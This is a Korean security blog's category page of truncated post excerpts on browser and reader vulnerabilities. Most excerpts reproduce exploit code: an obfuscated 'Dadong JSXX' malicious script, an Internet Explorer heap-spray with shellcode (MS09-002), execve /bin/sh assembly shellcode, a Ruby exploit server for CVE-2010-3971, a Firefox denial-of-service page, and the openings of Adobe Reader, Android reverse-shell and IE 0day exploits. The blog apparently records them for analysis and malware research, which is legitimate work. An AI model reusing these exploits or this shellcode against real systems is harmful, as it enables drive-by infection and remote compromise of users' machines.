ByJJoon's Lab

[카테고리:] Security

  • Encrypt By Dadong’s JSXX 난독화 해제 방법

    최근 국내에 삽입되는 악성스크립트 중 “Encrypt By Dadong’s JSXX 버전명 VIP” 이란 주석이 포함된 난독화 된 스크립트가 확인되어 디코딩 하는 방법에 대해 작성해 보도록 하겠습니다. 우선 0.31 버전부터 살펴보도록 하겠습니다. <html><body> <button id='yEcOINWqzAvRosxxYgfclJYYclNTLbYCYFtXENkMxhsYvkGkpiwAZqiGoKePsqQqkxgBXxZQKYzdhiEfqwBXZjZwQp' onclick='WzdLiWKZevlgmLyiBITcqfDodayoljhqyoEwCJBe();' style='display:none'></button> <script language='javascript'> var bak, bak1, bak2, bak3, bak4; bak='%';var wud='%';var tihs='%';var jj=bak+'u'+'4B5B';var lzg='%'; bak1='u'; wud+='u'; tihs+='u';var kk=bak+'u'+'CD36';lzg+='u'; bak2='58';wud+='B'; tihs+='B';var ll=bak+'u'+'BD8F';lzg+='B'; […]

  • Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002, CVE-2009-0075)

    <SCRIPT LANGUAGE="JavaScript"> <!– Hide function killErrors() { return true; } window.onerror = killErrors; // –> </SCRIPT> <script language="JavaScript"> var aaa4='생략'; var aa4=(aaa4.replace(/MV/g,"%u")); var shellcode=unescape(aa4); var array = new Array(); var calc = 0x100000-(shellcode.length*2+0x01020); var point = unescape("%u0D0D%u0D0D"); while(point.length<calc) { point+=point;} var sec = point.substring(0,calc/2); delete point; for(i=0; i<0xD0; i++) { array[i] = sec + shellcode; […]

  • 쉘코드 제작하기!

    .globl main main: jmp strings start: pop %esi xor %eax, %eax // 초기화 xor %ebx, %ebx // 초기화 xor %ecx, %ecx // 초기화 xor %edx, %edx // 초기화 mov %esi, 0x0(%esp) // %esp+0 부분에 "/bin/sh" 입력, name[0] mov %eax, 0x4(%esp) // %esp+4 부분에 NULL 입력, name[1] mov $0xb, %al // execve 시스템콜에 해당하는 0xb %eax에 […]

  • Internet Explorer 8 CSS Parser Exploit – (CVE-2010-3971, MS11-003)

    인터넷 익스플로러 8 버전에 대한 취약점이 나와 기록해 둡니다. http://www.exploit-db.com/exploits/15746/ #!/usr/bin/env ruby # Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ # Author: Nephi Johnson (d0c_s4vage) require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] to_send = "HTTP/1.1 #{code} #{message}\r\n" + "Date: Sat, 11 Dec 2010 14:20:23 […]

  • UCS2 shellcode를 hex로 변환 후 문자열 확인

    리눅스 머신에서 쉘코드에서 문자열 확인할 때 편하게 하고자 작성한 스크립트 입니다. 작성하고 사용하다 보니 최근 국내에 삽입되는 온라인게임핵 관련 악성코드는 XOR로 악성코드를 다운로드 받는 URL이 암호화 되어 있는데 이걸 좀 더 쉽게 찾을 수 있는 방법이 되기도 하네요… #!/usr/bin/env python import sys shellcode = sys.argv[1] paser = shellcode.split('%u') output = '' for x in paser: […]

  • objdump를 이용한 쉘코드 추출 스크립트

    vortex 8번 문제는 쉘코드를 작성해야 하는 문제인데 코드를 작성하여 gcc로 컴파일 후 objdump를 이용하여 쉘코드만 따로 뽑아내는 작업이 너무 번거로워 간단하게 스크립트로 작성하였습니다. #!/usr/bin/env python import re, sys, os def parser(): f = open('dump.txt', 'r') data = f.read() f.close() data = re.split('[0-9a-f]{8} <', data) for x in data: try: title = re.search('.*>:', x).group() except: title […]

  • Mozilla Firefox <= 3.6.12 Remote Denial Of Service

    최근에 Firefox 취약점이 자주 나오네요.. 불안하게 -_- 출처 : http://www.exploit-db.com/exploits/15498/ <!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <[email protected]> Marco 'white_sheep' Rondini <[email protected]> Alessandro 'scox' Scoscia <[email protected]> –> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>

  • Adobe Reader 관련 취약점 정리

    Adobe 관련 취약점들이 수도없이 쏟아져 나왔으며 계속해서 나오고 있다. 정리가 필요할 거 같아 정리해둔다. 빠진건 계속해서 업데이트 하고 우선 이것들만…… 이후엔 Sandbox 형태로 바뀔거라고 하던데 과연? util.printf – CVE-2008-2992 Adobe Reader Javascript Printf Buffer Overflow Exploit =========================================================== Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow CVE-2008-2992 Thanks to coresecurity for the technical background. 6Nov,2008: Exploit released by me Credits: Debasis Mohanty […]

  • Android 2.0-2.1 Reverse Shell Exploit – CVE-2010-1807

    안드로이드에서 원격에서 실행가능한 취약점이 확인되었네요.. 기록용으로 남겨 둡니다. 출처 : http://www.exploit-db.com/exploits/15423/, http://www.exploit-db.com/exploits/15548/ <html> <head> <script> // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android 🙂 //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 – 2.1 //patched= android 2.2 //author = mj […]

  • Internet Explorer Memory Corruption 0day Vulnerability – CVE-2010-3962, MS10-090

    익스플로러 취약점이 또 나왔네요. 악성코드 유포에 이용될 수 있기에 기록해 둡니다. 출처 : http://www.exploit-db.com/exploits/15421/ # Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com # notes : This is a quick and […]